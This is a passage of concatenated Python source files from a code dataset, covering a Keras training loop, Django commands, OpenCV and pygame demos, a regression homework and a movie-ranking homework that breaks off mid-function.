'DATASETS/VIDEO/TENNIS/SPLITS/S005/GROUND/all_soft_val_11_kv.pkl'))\n\n num_of_samples = dataset_val.number_of_samples()\n num_of_batches = int(math.floor(num_of_samples / float(batch_size)))\n sample_count = 0\n for batch_count in range(0, num_of_batches):\n\n x, y, sid = dataset_val.get_batch_xy(True)\n sample_count += len(y)\n\n if (int((float(batch_count) / num_of_batches) * 100) > past) or (batch_count == num_of_batches - 1):\n\n val_metrics.append(model.test_on_batch(x, y))\n\n if int((float(sample_count) / num_of_samples) * 100) > past:\n print_n_log(log, '.')\n past += 10\n\n val_results = np.average(val_metrics, axis=0)\n print_n_log(log, '\\n' + str(val_results))\n\n v_l[0].append(e)\n v_l[1].append(val_results[0])\n v_a[0].append(e)\n v_a[1].append(val_results[1])\n\n # Save Figure\n # fig.savefig(model_path + '/training.png')\n # if not paths.is_cluster():\n # fig.savefig(model_path + '/training.pdf')\n\n # Save Model\n # model.save_weights(model_path + '/' + model_id + '_' + identifier + '-e' + str(e) + '_weights.h5', overwrite=True)\n # if not paths.is_cluster():\n # model.save(model_path + '/' + model_id + '_' + identifier + '-e' + str(e) + '.h5', overwrite=True)\n\n test(model_id, identifier, model_path, 'test', batch_size, e, None, model=model, force_noneq=False)\n test(model_id, identifier, model_path, 'test', batch_size, e, None, model=model, force_noneq=True)\n\n # Save Training Stats\n np.save(model_path + '/training_stats-e'+str(e)+'.npy', [t_l, v_l, v_a])\n\n tt = time.clock() - training_start_time\n\n print_n_log(log, '\\n\\nTotal Time Taken: %02d:%02d:%02d;\\n' % (int((tt / 60) / 60), int((tt / 60) % 60), int(tt % 60)))\n\n print_n_log(log, '\\nTraining Finished\\n')\n log.close()\n\n\n\n\nif __name__ == \"__main__\":\n\n CLUSTER = paths.is_cluster() # AT END OF PROJECT MAYBE FIX SO\n\n if CLUSTER:\n p = argparse.ArgumentParser()\n\n p.add_argument('model_id', help='The model ID MV..._01')\n p.add_argument('identifier', help='The model identifier')\n p.add_argument('model_path', help='The path the model save location')\n p.add_argument('nb_epoch', type=int, default=20, help='The number of epochs (def: 20)')\n p.add_argument('batch_size', type=int, default=16, help='The batch size (def: 16)')\n p.add_argument('--load_epoch', help=\"load a particular saved epoch\")\n\n p = p.parse_args()\n train(p.model_id, p.identifier, p.model_path, p.nb_epoch, p.batch_size, p.load_epoch)\n else:\n identifier = '00001'\n model_path = paths.get_model_path('KERAS')\n nb_epoch = 5\n batch_size = 16\n load_epoch = None\n\n model_id = 'MVSK_61_41'\n train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n model_id = 'MVSK_61_42'\n train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n # model_id = 'MVSK_65_46'\n # train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n # model_id = 'MVSK_65_47'\n # train(model_id, identifier, model_path, nb_epoch, batch_size, load_epoch)\n","sub_path":"keras_code/train_test_nosave.py","file_name":"train_test_nosave.py","file_ext":"py","file_size_in_byte":18560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"212036634","text":"from django.core.management.base import BaseCommand, CommandError\n#from books.models import Verse\nimport csv\nimport os\nfrom pprint import pprint\nfrom books.models import *\nfrom django.template.defaultfilters import slugify\n\ndef make_verse(book, chapter, verse, text):\n \n \n v = Verse()\n v.book = book\n v.chapter = int(chapter)\n v.verse = int(verse)\n v.chapter_str = chapter\n v.verse_str = verse\n v.text = text\n v.save()\n print(v.book, v.chapter_str, v.verse_str, v.text)\n\nclass Command(BaseCommand):\n help = 'Commits a book from a text file properly formatted'\n\n def add_arguments(self, parser):\n parser.add_argument('--path', type=str)\n\n def handle(self, *args, **options):\n path = os.path.join('tmp',\"%s.csv\"%options['path'])\n \n if not os.path.exists(path):\n raise CommandError('\"%s\" does not exist' % path)\n \n key={}\n \n #get key\n reader = csv.reader(open('tmp/key_english.csv'))\n print(reader)\n for row in reader:\n if(row[0].isdigit()):\n key[row[0]] = row[1]\n \n \n \n #get bible verses\n reader = csv.reader(open(path))\n \n for row in reader:\n if(row[1].isdigit()):\n print(key[row[1]])\n \n book, created = Book.objects.get_or_create(slug=slugify(row[1]), name=row[1], canonical=True)\n \n make_verse(book, row[2], row[3], row[4])\n","sub_path":"workarea/management/commands/rip.py","file_name":"rip.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"233381188","text":"import cv2\nimport numpy as np\nfrom dataPath import DATA_PATH\n\n# Read color image\nfilename = DATA_PATH+\"images/night-sky.jpg\"\nim = cv2.imread(filename)\n\n# Convert to HSV\nimhsv = cv2.cvtColor(im, cv2.COLOR_BGR2HSV)\nimhsvCLAHE = imhsv.copy()\n\n# Perform histogram equalization only on the V channel\nimhsv[:,:,2] = cv2.equalizeHist(imhsv[:,:,2])\n\nclahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8,8))\nimhsvCLAHE[:,:,2] = clahe.apply(imhsvCLAHE[:,:,2])\n\n# Convert back to BGR format\nimEq = cv2.cvtColor(imhsv, cv2.COLOR_HSV2BGR)\nimEqCLAHE = cv2.cvtColor(imhsvCLAHE, cv2.COLOR_HSV2BGR)\n\ncv2.imshow(\"Original Image\", im)\ncv2.imshow(\"Histogram Equalized\",imEq)\ncv2.imshow(\"CLAHE\", imEqCLAHE)\ncv2.waitKey(0)\n","sub_path":"week4-python/ColorTransformations/CLAHE.py","file_name":"CLAHE.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"63600575","text":"import numpy as np\r\nimport scipy as sp\r\n#NO OTHER IMPORTS ALLOWED (However, you're allowed to import e.g. scipy.linalg)\r\n\r\ndef estInitialize():\r\n # Fill in whatever initialization you'd like here. This function generates\r\n # the internal state of the estimator at time 0. You may do whatever you\r\n # like here, but you must return something that is in the format as may be\r\n # used by your run() function.\r\n #\r\n\r\n #we make the interal state a list, with the first three elements the position\r\n # x, y; the angle theta; and our favourite color. \r\n x = 0\r\n y = 0\r\n theta = 0\r\n color = 'green' \r\n # note that there is *absolutely no prescribed format* for this internal state.\r\n # You can put in it whatever you like. Probably, you'll want to keep the position\r\n # and angle, and probably you'll remove the color.\r\n internalState = [x,\r\n y,\r\n theta, \r\n color\r\n ]\r\n\r\n return internalState\r\n\r\n","sub_path":"estInitialize.py","file_name":"estInitialize.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"650574097","text":"import random\n\nprint(\"Title:-------Hello world&Hello Python-------\")\nprint(\"Here is a game:guessNumber 2.0\")\n#实现当输入错误数据时,提示正确数据的大小关系。\n#实现多次猜测的机会。\n#实现对于正确数据的随机性\n#使用and语句实现多条件限制\nguess=random.randint(1,10)\ntemp=int(input(\"input a number : \"))\nwrongNumber=0\nwhile (temp != guess)and(wrongNumber<4): \n if guess < temp:\n print(\"Big\")\n else:\n print(\"Small\")\n temp=int(input(\"input a number\"))\n wrongNumber=wrongNumber+1\nif guess==temp:\n print(\"Ok\")\nelse:\n print(\"The maximum number of errors has been reached\")\nprint(\"The game is end\")\n\n#------Tips 1------\n#type(parameter)查看给定参数的数据类型\n#isinstance(parameter1,parameter2)对比给定两个参数的数据类型的相似性,返回值类型Boolen\n#int(parameter)将给定的参数转换为int型数据,并将其返回。\n#str(),float()返回字符串类型和字符类型。\n\n#------Tips 2------\n# +(加)、-(减)、*(乘)、/(除)、//(下除,比如3//4==1)、**(求幂)、%(求余)\n#基本算术运算符的优先级为:先加减后乘除。\n#对于幂操作,幂运算操作大于其左侧数据小于其右侧数据,比如 -2 ** 4=-16\n\n#------Tips 3------\n#比较操作符<、<=、>、>=、==、!=\n#逻辑操作符:and、or、not\n\n#对于整体的优先级:\n# **\n# 正负号\n# *、/、//\n# =、-\n# <、<=、>、>=、==、!=\n# not and or\n","sub_path":"Season2.py","file_name":"Season2.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"36587127","text":"\"\"\"\nGiven a machine that draws a 100 unique cards, what is the average number\nof draws to get a duplicate?\n\"\"\"\n\nimport math\n\ntotal = 0\nfor i in range(1, 101):\n total += (i - 1) / (math.factorial(101 - i) * 100 ** (i - 1)) * i # Probability\ntotal *= math.factorial(99)\n\nprint(total)\n","sub_path":"cool_programs/hundred_cards.py","file_name":"hundred_cards.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"378787379","text":"from compas_pattern.datastructures.mesh.mesh import Mesh\nfrom compas_pattern.datastructures.mesh.operations import mesh_move_vertex_to\nfrom compas.numerical import fd_numpy\nfrom compas_plotters.meshplotter import MeshPlotter\n\ndef find_form(mesh):\n vertices = [mesh.vertex_coordinates(vkey) for vkey in sorted(list(mesh.vertices()))]\n edges = list(mesh.edges())\n fixed = mesh.vertices_on_boundary()\n print(len(fixed))\n q = [1.0] * len(edges)\n loads = [[0.0, 0.0, 50.0 / len(vertices)]] * len(vertices)\n xyz, q, f, l, r = fd_numpy(vertices, edges, fixed, q, loads)\n for vkey, coordinates in zip(sorted(list(mesh.vertices())), xyz):\n mesh_move_vertex_to(mesh, coordinates, vkey)\n\nmesh = Mesh.from_json('/Users/Robin/Desktop/simple_mesh.json')\n# print(sorted(list(mesh.vertices())))\nfind_form(mesh)\n\n# for i in range(len(boundary)):\n# if boundary[i] != boundary2[i]:\n# print('!')\n\nplotter = MeshPlotter(mesh, figsize=(20, 20))\nplotter.draw_vertices(radius=0.1)\nplotter.draw_edges()\nplotter.draw_faces()\nplotter.show()\n","sub_path":"playground/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"198162962","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport csv \nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\ndata = pd.read_csv(sys.argv[1],encoding='big5')\ndata = data.replace('NR', 0)\n\ntrain_Rdata = data.drop(data.columns[[0, 1, 2]], axis=1).apply(pd.to_numeric).as_matrix()\n\n\n# In[2]:\n\ntrain_Rdata = data.drop(data.columns[[0, 1, 2]], axis=1).apply(pd.to_numeric).as_matrix()\ndata1 = train_Rdata[0::18,:].reshape(1, 5760)\ndata2 = train_Rdata[1::18,:].reshape(1, 5760)\ndata3 = train_Rdata[2::18,:].reshape(1, 5760)\ndata4 = train_Rdata[3::18,:].reshape(1, 5760)\ndata5 = train_Rdata[4::18,:].reshape(1, 5760)\ndata6 = train_Rdata[5::18,:].reshape(1, 5760)\ndata7 = train_Rdata[6::18,:].reshape(1, 5760)\ndata8 = train_Rdata[7::18,:].reshape(1, 5760)\ndata9 = train_Rdata[8::18,:].reshape(1, 5760)\ndata10 = train_Rdata[9::18,:].reshape(1, 5760)\ndata11 = train_Rdata[10::18,:].reshape(1, 5760)\ndata12 = train_Rdata[11::18,:].reshape(1, 5760)\ndata13 = train_Rdata[12::18,:].reshape(1, 5760)\ndata14 = train_Rdata[13::18,:].reshape(1, 5760)\ndata15 = train_Rdata[14::18,:].reshape(1, 5760)\ndata16 = train_Rdata[15::18,:].reshape(1, 5760)\ndata17 = train_Rdata[16::18,:].reshape(1, 5760)\ndata18 = train_Rdata[17::18,:].reshape(1, 5760)\n\ntrain_data = np.vstack((data1, data2, data3, data4, data5, data6, data7, data8, data9, data10, data11, data12, data13, data14, data15, data16, data17, data18))\n\n\n# In[3]:\n\ntrain_x = [] #features 共5751組 一組有163個 第一個是1跟bias相乘\ntrain_y = [] #PM2.5 answer\n\ntrain_y.append(train_data[9, 9:])\ntrain_y= np.asarray(train_y).reshape(5751, 1)\n\nfor t in range(5751):\n train_x.append(1)\n for j in range(18):\n for i in range(9):\n train_x.append(train_data[j,i+t])\n\ntrain_x = np.asarray(train_x).reshape(5751, 163)\n\n\n# In[4]:\n\nwei = np.zeros((163,1))\nlr = 0.05\niteration = 80000\npre_gra = 0\n\nfor p in range(iteration):\n gradient = np.zeros_like(wei)\n gradient = (2*(train_x.dot(wei) - train_y).T.dot(train_x).T)\n pre_gra += gradient**2\n adg = np.sqrt(pre_gra)\n wei = wei - lr/adg*gradient\n\n\n# In[ ]:\n\ntest_data = pd.read_csv(sys.argv[2], encoding='big5', header = None)\ntest_data = test_data.replace('NR', 0)\ntest_data1 = np.matrix((test_data.values[:, 2:]), dtype='float64')\na = np.ones((240,1))\ntest_data1 = np.hstack((a, test_data1.reshape(240,162)))\npredict = test_data1.dot(wei)\nidvalue = test_data.ix[1::18, 0]\nidvalue = idvalue.reshape((240,1))\npredict = np.hstack((idvalue,predict))\ndf = pd.DataFrame(data = predict,columns = ['id','value'])\ndf\ndf.to_csv(sys.argv[3], index = False)\n\n","sub_path":"hw1/hw1.py","file_name":"hw1.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"197986982","text":"def Listing_06():\n# Listing 04.06 for statement using indexing\n A = np.random.randint(100, size=10)\n print('A = ' + str(A))\n theMax = A[0]\n theIndex = 0\n for index in np.arange(0,len(A)):\n x = A[index]\n if x > theMax:\n theMax = x\n theIndex = index\n print('The max value is ' + str(theMax) + ' at index ' + str(theIndex))","sub_path":"popeye/web_server/listing_exec_app/lib/default_code/ch_4/Listing_4_6.py","file_name":"Listing_4_6.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"632315430","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('establish', views.establish),\n path('business', views.business),\n path('activity', views.activity),\n path('scontent', views.scontent),\n path('news', views.news),\n path('support', views.support),\n path('team', views.team),\n path('event', views.event),\n path('map', views.map),\n path('board/', views.board),\n path('board//', views.viewboard, name='viewboard'),\n]","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"254411120","text":"from os import listdir\nfrom os.path import isfile, join\n\nwad_dir = '../../data/maps/out/'\n\n\ndef get_valid_wad_ids(wad_dir):\n all_files = [f for f in listdir(wad_dir) if isfile(join(wad_dir, f))]\n wad_files = [f for f in all_files if f.endswith('wad')]\n wad_ids = [int(f.split('_')[1]) for f in wad_files]\n wad_ids.sort()\n\n return wad_ids\n","sub_path":"examples/python/train_sptm/src/train/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"489530826","text":"# -*-coding=utf-8-*-\r\n\"\"\"\r\nWherever smart people work, doors are unlocked. -- Steve Wozniak\r\n\"\"\"\r\n#############\r\n#需求分析\r\n#1. 需要有url_list\r\n#2. 需要get并且decode_url\r\n#3. 保准html页面\r\n##属性\r\n# 通过分析贴吧url:https://tieba.baidu.com/f?ie=utf-8&kw=%E6%9B%BC%E8%81%94&fr=search\r\n# 发现的是只需要修改kw(key_word)后面的str即可改变访问哪个贴吧\r\n# pn = 0 代表第一页,pn = 50 带表第二页 ,依次类推\r\n## 1. 贴吧的名字\r\n## 2. 需要爬取的页数\r\n## 3. requests请求头\r\n\r\n## 方法\r\n# 1.获取url\r\n# 2.url get + decode\r\n# 3.html保存\r\n\r\n## 发现的问题\r\n# 1. class name 后面不用()\r\n# 2. request的get的url需要使用type(str)\r\n# 3. 为什么存放url用的是list而不是例如tuple\r\n# - list是可变对象 而tuple是不可变的对象?\r\n# 4.属性缺失爬虫的请求头\r\n# 5. utf 经常写成uft\r\n\r\n## 不熟练的地方\r\n# 1. str 的 format\r\n# 2. 类名需要使用大驼峰命名法\r\n# 3. python 对文件的操作 with open 等用法\r\n#############\r\nimport requests\r\n\r\nclass SpiderTieba:\r\n def __init__(self, name, page_num_total, headers):\r\n self.name = name\r\n self.page_num_total = page_num_total\r\n self.headers = headers\r\n \r\n def url_source(self):\r\n url_list = []\r\n for page_num in range(self.page_num_total):\r\n url_new = 'https://tieba.baidu.com/f?kw={}&ie=utf-8&pn={}'.format(self.name, page_num*50)\r\n url_list.append(url_new)\r\n return url_list\r\n \r\n def url_parse(self, url):\r\n response = requests.get(url=url, headers=self.headers)\r\n return response.content.decode()\r\n\r\n def save_html(self, url_parsed_file, page_num):\r\n '''[summary]\r\n \r\n Arguments:\r\n url_parsed_file {[html]} -- [description:url解析后的文件,由url_parse()返回结果得到]\r\n page_num {[number]} -- [description:页码]\r\n '''\r\n html_save_path = '.\\{}吧的第{}页.html'.format(self.name, page_num)\r\n with open(html_save_path, \"w\", encoding = 'utf-8') as f:\r\n f.write(url_parsed_file)\r\n\r\n def run(self):\r\n url_list = self.url_source()\r\n for (page_num, url) in enumerate(url_list):\r\n self.save_html(self.url_parse(url), page_num+1)\r\n\r\nif __name__ == \"__main__\":\r\n name = '皇马'\r\n page_num_total = 5\r\n headers = headers ={'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'} \r\n \r\n Spider_Tieba_Huangma = SpiderTieba(name, page_num_total, headers)\r\n Spider_Tieba_Huangma.run()\r\n \r\n\r\n","sub_path":"爬虫/爬取皇马吧html/tieba_spider.py","file_name":"tieba_spider.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"574609003","text":"import pygame, time\n\nclass SequenceAnimation(pygame.sprite.RenderPlain):\n def __init__(self,spritesheetname,framew,frameh,frametime,beginsequence,beginframe,pos):\n spritesheet = pygame.image.load(spritesheetname)\n self.STATE_DRAWING = 0\n self.STATE_STATIC = 1\n self.spritesheet = spritesheet\n self.framew = framew\n self.frameh = frameh\n self.frametime = frametime\n self.state = self.STATE_STATIC\n self.currentimage = [beginframe,beginsequence]\n self.image = pygame.Surface((framew,frameh))\n self.rect = pygame.Rect(pos,pos)\n self.currentsequence = beginsequence\n self.currentframe = beginframe\n self.updateImage()\n self.timer = 0\n self.maxframe = spritesheet.get_width()/framew-1\n self.maxsequence = spritesheet.get_height()/frameh-1\n \n \n def updateImage(self):\n frame = self.currentframe\n seq = self.currentsequence\n #print(\"getting image form frame \" + str(frame) + \" and seq \" + str(seq))\n fromarea = pygame.Rect(frame*self.framew,seq*self.frameh,self.framew,self.frameh)\n self.image.fill((0,0,0))\n self.image.blit(self.spritesheet,(0,0),fromarea)\n \n def beginSequence(self,seq):\n self.state = self.STATE_DRAWING\n self.currentsequence = seq\n self.currentframe = 0\n self.updateImage()\n self.timer = time.time()\n \n def setStaticFrame(self,frame,seq):\n self.currentframe = frame\n self.currentsequence = seq\n self.state = self.STATE_STATIC\n print(\"Setting static frame \"+str(frame)+\" \"+str(seq))\n #exit()\n self.updateImage()\n \n def update(self):\n if self.state == self.STATE_STATIC:\n return None\n \n t = time.time()\n #print(\"time was \" + str(t))\n dt = 1000*(t - self.timer)\n if dt > self.frametime:\n self.currentframe = self.currentframe + 1;\n self.timer = time.time() \n if self.currentframe > self.maxframe:\n self.currentframe = 0\n self.updateImage()\n","sub_path":"GuyBrushPlatform/src/animation.py","file_name":"animation.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"493288422","text":"from sodapy import Socrata\r\n\r\nclient = Socrata(\"data.energystar.gov\", \"vgyKxcIsmG0ygfvItqpaxSzdb\")\r\npower = 20\r\nproducts = {\"Light_Bulb\":\"sqpq-tg7c\",\"Ceiling_Fan\":\"qq83-fs92\"}\r\ndata = client.get(\"sqpq-tg7c\", content_type=\"json\",technology=\"LED\", where='energy_used_watts>=' + str(power), order='energy_used_watts')\r\nprint(\"hello\")\r\n\r\n_prod_type = 'product_type like light'\r\n_prod = products[\"Ceiling_Fan\"]\r\n#query_data = client.get( _prod, content_type=\"json\", indoor_outdoor=\"indoor\", where='product_type like light', limit=10)\r\nquery_data1 = client.get( _prod, content_type=\"json\", where='fan_power_consumption_high_speed_w > 30', order='fan_power_consumption_high_speed_w ASC')\r\nquery_data1 = client.get( _prod, content_type=\"json\", where='fan_power_consumption_high_speed_w < 30', order='fan_power_consumption_high_speed_w DESC')\r\nquery_data2 = client.get( _prod, content_type=\"json\",indoor_outdoor='indoor', limit=10)\r\n#query_data3 = client.get( _prod, content_type=\"json\",where=\"product_type like indoor\", limit=10)\r\nprint(\"hello\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"testing_energy_star_product_finder.py","file_name":"testing_energy_star_product_finder.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"444898027","text":"def fibonnaci_numbers(chosen_range):\n fib_nums = [1]\n current_num = 0\n\n for num in range(0, chosen_range - 1):\n fib_nums.append(fib_nums[num] + current_num)\n current_num = fib_nums[num]\n\n return fib_nums\n\nbound = int(input(\"How many fibonnacci numbers do you want?: \"))\nprint(fibonnaci_numbers(bound))","sub_path":"python_beginner_exercises/exercise_13.py","file_name":"exercise_13.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"153590711","text":"import math\n\ndef binary(binaryString):\n\tbits = len(binaryString)-1\n\tdecimalNum = 0\n\tfor character in binaryString:\n\t\tdecimalNum += math.pow(2, bits) * int(character)\n\t\tbits -= 1\n\tprint(str(binaryString) + \" in decimal is \" + str(decimalNum))\n\ndef main():\n\tbinaryString = input(\"Enter a binary number: \")\n\tbinary(binaryString)\n\nmain()","sub_path":"daily_python_5-20.py","file_name":"daily_python_5-20.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"162908663","text":"\"\"\"\n * Copyright 2020, Departamento de sistemas y Computación, Universidad de Los Andes\n * \n * Contribución de:\n *\n * Cristian Camilo Castellanos\n *\n * Desarrolado para el curso ISIS1225 - Estructuras de Datos y Algoritmos\n *\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program. If not, see .\n \"\"\"\n\n\"\"\"\n Este módulo es una aplicación básica con un menú de opciones para cargar datos, contar elementos, y hacer búsquedas sobre una lista .\n\"\"\"\n\nimport config as cf\nimport sys\nimport csv\n\nfrom ADT import list as lt\nfrom DataStructures import listiterator as it\nfrom DataStructures import liststructure as lt\n\nfrom time import process_time \n\n\n\ndef printMenu():\n \"\"\"\n Imprime el menu de opciones\n \"\"\"\n print(\"\\nBienvenido\")\n print(\"1- Cargar Datos\")\n print(\"2- Ranking de peliculas\")\n print(\"3- Conocer un director\")\n print(\"4- Conocer un actor\")\n print(\"5- Entender un genero\")\n print(\"6- Crear ranking\")\n print(\"0- Salir\")\n\n\n\n\ndef compareRecordIds (recordA, recordB):\n if int(recordA['id']) == int(recordB['id']):\n return 0\n elif int(recordA['id']) > int(recordB['id']):\n return 1\n return -1\n\n\n\ndef loadCSVFile (file, cmpfunction):\n lst=lt.newList(\"ARRAY_LIST\", cmpfunction)\n dialect = csv.excel()\n dialect.delimiter=\";\"\n try:\n with open( cf.data_dir + file, encoding=\"utf-8\") as csvfile:\n row = csv.DictReader(csvfile, dialect=dialect)\n for elemento in row: \n lt.addLast(lst,elemento)\n except:\n print(\"Hubo un error con la carga del archivo\")\n return lst\n\n\ndef loadMovies ():\n lst = loadCSVFile(\"theMoviesdb/MoviesCastingRaw-small.csv\",compareRecordIds) \n print(\"Datos cargados, \" + str(lt.size(lst)) + \" elementos cargados\")\n return lst\n\ndef loadDetails():\n lst=loadCSVFile(\"theMoviesdb/SmallMoviesDetailsCleaned.csv\",compareRecordIds)\n print(\"Datos cargados, \" + str(lt.size(lst)) + \" elementos cargados\")\n return lst\n\ndef comparacion_m1 (element1, element2):\n return element1[1][\"promedio\"] > element2[1][\"promedio\"]\n\ndef comparacion_me1 (element1, element2):\n return element1[1][\"promedio\"] < element2[1][\"promedio\"]\n\ndef comparacion_m_v1 (element1, element2):\n return element1[1][\"votos\"] < element2[1][\"votos\"]\n\ndef comparacion_me_v2 (element1, element2):\n return element1[1][\"votos\"] > element2[1][\"votos\"]\n\ndef ranking_peliculas (num_peli, v_p, as_des, lstD): #Requerimiento 2\n ranking = lt.newList('SINGLE_LINKED', None)\n t1_start = process_time()\n if (lstD[\"size\"])==0:\n print(\"La lista esta vacía\") \n return 0\n num_peli = int()\n pelis = []\n conta = 0\n while num_peli >= 10:\n nombre = \"\"\n if v_p.lower() == \"promedio\" and as_des.lower() == \"ascendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_average\"]) > 0 and element[\"title\"] not in pelis:\n x = float(element[\"vote_average\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,x])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"promedio\" and as_des.lower() == \"descendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_average\"]) < 10 and element[\"title\"] not in pelis:\n y = float(element[\"vote_average\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,y])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"votos\" and as_des.lower() == \"ascendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_count\"]) > 0 and element[\"title\"] not in pelis:\n x = float(element[\"vote_count\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,x])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"votos\" and as_des.lower() == \"descendente\":\n for i in range(1, lt.size(lstD)):\n element = lt.getElement(lstD, i)\n if float(element[\"vote_count\"]) < 13000 and element[\"title\"] not in pelis:\n y = float(element[\"vote_count\"])\n nombre = element[\"title\"]\n lt.addFirst(ranking,[nombre,y])\n pelis.append(nombre)\n conta = conta + 1\n \n if v_p.lower() == \"promedio\" and v_p.lower() == \"ascendente\":\n lt.insertion(ranking, comparacion_m1)\n if v_p.lower() == \"promedio\" and v_p.lower() == \"descendente\":\n lt.insertion(ranking, comparacion_me1)\n if v_p.lower() == \"votos\" and v_p.lower() == \"ascendente\":\n lt.insertion(ranking, comparacion_m_v1)\n if v_p.lower() == \"votos\" and v_p.lower() == \"descendente\":\n lt.insertion(ranking, comparacion_me_v2)\n \n t1_stop = process_time()\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n\n return (ranking)\n\ndef peliculas_por_director(criteria, column, lst):\n peliculas_director=lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterator=it.newIterator(lst)\n while it.hasNext(iterator):\n element=it.next(iterator)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_director,element[\"id\"])\n return peliculas_director\n\ndef conocer_director(criteria, column, lstC,lstD): #Requerimiento 3\n t1_start = process_time() #tiempo inicial\n sum_average=0\n lista_director=lt.newList(\"ARRAY_LIST\", None)\n peliculas_director=peliculas_por_director(criteria,\"director_name\",lstC)\n if (lstD[\"size\"])==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterator2=it.newIterator(lstD)\n while it.hasNext(iterator2):\n element=it.next(iterator2)\n if element[\"id\"] in peliculas_director[\"elements\"]:\n sum_average+=float(element[\"vote_average\"])\n lt.addFirst(lista_director,element[\"original_title\"])\n promedio=round((sum_average/lista_director[\"size\"]),3)\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (lista_director,promedio)\n\ndef peliculas_por_actor1(criteria, column, lst):\n peliculas_actor = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor,element[\"id\"])\n return peliculas_actor\n\ndef peliculas_por_actor2(criteria, column, lst):\n peliculas_actor2 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor2,element[\"id\"])\n return peliculas_actor2\n\ndef peliculas_por_actor3(criteria, column, lst):\n peliculas_actor3 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n iterador=it.newIterator(lst)\n while it.hasNext(iterador):\n element = it.next(iterador)\n if criteria.lower() in element[column].lower():\n lt.addLast(peliculas_actor3,element[\"id\"])\n return peliculas_actor3\n\ndef peliculas_por_actor4(criteria, column, lst):\n peliculas_actor4 = lt.newList(\"ARRAY_LIST\",None)\n if len(lst)==0:\n print(\"La lista esta vacía\") 